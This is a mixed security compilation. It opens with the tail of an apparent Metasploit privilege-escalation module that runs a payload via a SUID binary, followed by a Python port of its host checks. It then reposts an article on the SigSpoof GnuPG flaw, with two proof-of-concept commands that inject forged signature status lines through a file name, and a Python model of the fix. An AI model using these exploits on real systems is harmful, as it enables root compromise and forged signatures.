    payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
    upload_and_chmodx payload_path, generate_payload_exe

    # Launch exploit
    print_status 'Launching exploit...'
    output = cmd_exec "echo '#{payload_path} & exit' | #{@executable_path}", nil, 30
    output.each_line { |line| vprint_status line.chomp }
  end

  def on_new_session(client)
    # remove root owned SUID executable
    if client.type.eql? 'meterpreter'
      client.core.use 'stdapi' unless client.ext.aliases.include? 'stdapi'
      client.fs.file.rm @executable_path
    else
      client.shell_command_token "rm #{@executable_path}"
    end
  end
end

Source
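The check method is the part of this module worth reusing when triaging hosts without Metasploit. The added example below (mine, not module code) replicates its gates in Python over values the caller collects with uname -r, uname -m, the user-namespace setting, the glibc package version and ldd --version; the version comparison mirrors Gem::Version applied to the part before the first "-", so "2.23-0ubuntu9" compares as 2.23. The two host profiles are constructed to match the builds the module has offsets for; how the user-namespace setting is read (for example /proc/sys/kernel/unprivileged_userns_clone on Debian kernels) is left to the caller.

```python
import re


def version_key(version):
    """Numeric prefix of a version string, compared the way the module does it:
    everything after the first '-' is dropped ("2.23-0ubuntu9" -> (2, 23),
    "4.4.0-112-generic" -> (4, 4, 0)) and the components compare as integers."""
    head = version.split("-")[0]
    return tuple(int(n) for n in re.findall(r"\d+", head))


def check_target(kernel_release, arch, userns_enabled, glibc_version, ldd_banner):
    """Same gates as the module's check(), in the same order.
    Returns ("Safe", reason) or ("Appears", reason)."""
    if version_key(kernel_release) < version_key("2.6.36"):
        return "Safe", "Linux kernel %s is not vulnerable" % kernel_release
    if "x86_64" not in arch:
        return "Safe", "architecture %s is not supported" % arch
    if not userns_enabled:
        return "Safe", "unprivileged user namespaces are not permitted"
    if version_key(glibc_version) > version_key("2.26"):
        return "Safe", "glibc %s is not vulnerable" % glibc_version
    # the exploit only carries offsets for two distribution builds
    if not ("2.23-0ubuntu" in ldd_banner or "2.24-11+deb9" in ldd_banner):
        return "Safe", "no offsets for this build of glibc"
    return "Appears", "glibc %s on kernel %s with user namespaces enabled" % (
        glibc_version, kernel_release)


# Constructed host profiles modelled on the two builds the module was tested against.
UBUNTU_1604 = dict(kernel_release="4.4.0-112-generic", arch="x86_64", userns_enabled=True,
                   glibc_version="2.23-0ubuntu9",
                   ldd_banner="ldd (Ubuntu GLIBC 2.23-0ubuntu9) 2.23")
DEBIAN_9 = dict(kernel_release="4.9.0-4-amd64", arch="x86_64", userns_enabled=True,
                glibc_version="2.24-11+deb9u1",
                ldd_banner="ldd (Debian GLIBC 2.24-11+deb9u1) 2.24")

if __name__ == "__main__":
    print(check_target(**UBUNTU_1604))
    print(check_target(**DEBIAN_9))
```

Two of the gates are the interesting ones for defenders: a Debian 9 host is only exposed once kernel.unprivileged_userns_clone has been turned on, and a glibc newer than 2.26 or from any other distribution build fails the offset match even though the underlying bug is the same.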
  25. SigSpoof flaw fixed in GnuPG, Enigmail, GPGTools, and python-gnupg.

For their entire existence, some of the world's most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday.

GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs.

Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone's public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can't be detected as malicious without doing forensic analysis that's beyond the ability of many users.

Backups and software updates affected, too

The flaw, indexed as CVE-2018-12020, means that decades' worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email.

CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online—including the cooperpair safe defaults, Ultimate GPG settings, and Ben's IT-Kommentare—turn it on. Once verbose is enabled, Brinkmann's post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others.

The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that's required to spoof a signature is to have a public key or key ID.

The attacks are relatively easy to carry out. The code for one of Brinkmann's PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is:

    $ echo 'Please send me one of those expensive washing machines.' \
      | gpg --armor -r VICTIM_KEYID --encrypt --set-filename "`echo -ne \''\
    \n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \
    \n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
    \n[GNUPG:] TRUST_FULLY 0 classic\
    \ngpg: '\'`" > poc1.msg

A second exploit is:

    echo "See you at the secret spot tomorrow 10am." | gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
    \n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \
    \n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
    \n[GNUPG:] TRUST_FULLY\
    \n[GNUPG:] BEGIN_DECRYPTION\
    \n[GNUPG:] DECRYPTION_OKAY\
    \n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
    \ngpg: '\'`" > poc2.msg

Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, "although the impact would have been different then and changed over time as more apps use GPG." He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in GnuPG version 2.2.8, Enigmail 2.0.7, GPGTools 2018.3, and python GnuPG 0.4.3. People who want to know the status of other applications that use OpenPGP should check with the developers.

Wednesday's vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to decrypt previously obtained emails that were encrypted using PGP or S/MIME. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook.

Separately, Brinkmann reported two SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. CVE-2018-12019 affecting Enigmail can be triggered even when the verbose setting isn't enabled. It, too, is patched in the just-released version 2.0.7. CVE-2018-12356, meanwhile, let remote attackers spoof file signatures on configuration files and extension scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is here.

Via arstechnica.com
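The mechanism behind both PoCs: when a front-end runs gpg with --verbose and takes status output on the same descriptor as the log (the --status-fd 2 arrangement the affected tools used), the verbose log echoes the attacker-chosen original file name, and a newline inside that name starts a line that the front-end's line parser cannot tell apart from a genuine status line. The added example below (mine, not Brinkmann's PoC or any project's code) models that with a simplified stand-in for gpg's output and a parser of the kind the front-ends used, then shows the two ways out: read status from a dedicated descriptor only, or have gpg escape control characters in the echoed name. The escaping used here is an assumption; the exact form GnuPG 2.2.8 adopted is not reproduced. The status lines and file name are constructed; the key ID and user ID are the ones in the first PoC.

```python
STATUS_PREFIX = "[GNUPG:] "

# Status lines an encrypted-but-unsigned message really produces (constructed,
# using the keywords that appear in the post's second PoC).
REAL_STATUS = [
    "ENC_TO 50749F1E1C02AB32 1 0",
    "BEGIN_DECRYPTION",
    "DECRYPTION_OKAY",
    "END_DECRYPTION",
]

# Attacker-chosen original file name, built the way the PoC builds it with
# --set-filename: close the quote, then forge status lines on fresh lines.
FORGED_FILENAME = (
    "'\n"
    + STATUS_PREFIX + "GOODSIG DB1187B9DD5F693B Patrick Brunschwig\n"
    + STATUS_PREFIX + "VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31"
      " 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\n"
    + STATUS_PREFIX + "TRUST_FULLY 0 classic\n"
    + "gpg: '"
)


def escape_control_chars(text):
    """Stand-in for the server-side fix (assumed form): control characters in
    the echoed file name become \\xNN, so the name can never start a new line."""
    return "".join(c if 32 <= ord(c) < 127 else "\\x%02x" % ord(c) for c in text)


def run_gpg_model(filename, status_lines, sanitize=False):
    """Simplified model of a verbose gpg run. Returns (combined, status_only):
    `combined` is what a front-end sees with status and log on one descriptor,
    `status_only` is what a dedicated --status-fd descriptor would carry."""
    if sanitize:
        filename = escape_control_chars(filename)
    log = "gpg: original file name='%s'\n" % filename
    status = "".join(STATUS_PREFIX + line + "\n" for line in status_lines)
    return log + status, status


def parse_status(stream):
    """Line parser in the style of the affected front-ends: any line that starts
    with the status prefix is trusted as a status record (keyword, args)."""
    records = []
    for line in stream.splitlines():
        if line.startswith(STATUS_PREFIX):
            keyword, _, args = line[len(STATUS_PREFIX):].partition(" ")
            records.append((keyword, args))
    return records


def signature_verdict(records):
    """The (keyid, uid) a mail client would display as the signer, or None."""
    for keyword, args in records:
        if keyword == "GOODSIG":
            keyid, _, uid = args.partition(" ")
            return keyid, uid
    return None


def demo():
    combined, status_only = run_gpg_model(FORGED_FILENAME, REAL_STATUS)
    sanitized, _ = run_gpg_model(FORGED_FILENAME, REAL_STATUS, sanitize=True)
    return {
        "verbose_shared_fd": signature_verdict(parse_status(combined)),
        "dedicated_status_fd": signature_verdict(parse_status(status_only)),
        "shared_fd_sanitized": signature_verdict(parse_status(sanitized)),
    }


if __name__ == "__main__":
    for setup, verdict in demo().items():
        print("%-22s %s" % (setup, verdict or "no signature"))
```

The front-end fix and the gpg fix are independent, which is why both sides shipped patches: a client that only ever parses a descriptor gpg uses for nothing but status lines is safe regardless of gpg's logging, and a gpg that never lets untrusted text begin a line protects clients that still share the descriptor.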